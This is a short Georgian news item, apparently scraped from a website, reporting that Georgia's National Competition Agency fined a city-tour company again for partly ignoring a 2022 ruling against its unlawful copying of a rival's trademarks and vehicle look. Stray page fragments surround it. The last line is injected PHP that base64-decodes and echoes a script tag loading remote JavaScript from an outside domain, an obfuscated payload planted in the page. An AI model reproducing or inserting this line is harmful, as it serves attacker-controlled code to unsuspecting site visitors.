celsiusi
ავერსი შნაიდერი

კონკურენციის სააგენტოს გადაწყვეტილების ნაწილობრივ შეუსრულებლობის გამო კომპანია განმეორებით დაჯარიმდა.  კერძოდ, როგორც სააგენტო იტყობინება, 2022 წლის 20 სექტემბერს, საქართველოს კონკურენციის ეროვნულმა სააგენტომ, "ეს.ი.ეი-ს“ საჩივრის საფუძველზე განხორციელებული საქმის მოკვლევა დაასრულა და დარღვევის ფაქტი დაადგინა.

საკითხი ეხებოდა - თბილისში, ტურისტებისთვის, ქალაქის ტურის მომსახურების სექტორში ორი კომპანიის დავას, სადაც სააგენტოს მიერ კომპანია "ბი ეს თის“ მხრიდან არაკეთილსინდისიერ ქმედება („კონკურენციის შესახებ“ საქართველოს კანონის 113 მუხლი) დადასტურდა. კერძოდ, მომჩივნის იდენტური სასაქონლო ნიშნებისა და სატრანსპორტო საშუალებების იერსახის უკანონო გამოყენება. შესაბამისად, სააგენტოს გადაწყვეტილებით, ხსენებულ კომპანიას ფინანსური სანქცია დაეკისრა და კანონდარღვევის აღმოფხვრა დაევალა.

სააგენტოს მიერ წარმოებული დაკვირვების შედეგად დადგინდა, რომ მოპასუხე კომპანიისთვის დადგენილი ვალდებულება ნაწილობრივ შესრულდა. აქედან გამომდინარე, სააგენტომ მოპასუხე ეკონომიკური აგენტის გაზრდილი მოცულობით განმეორებით დაჯარიმების გადაწყვეტილება მიიღო.

352
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");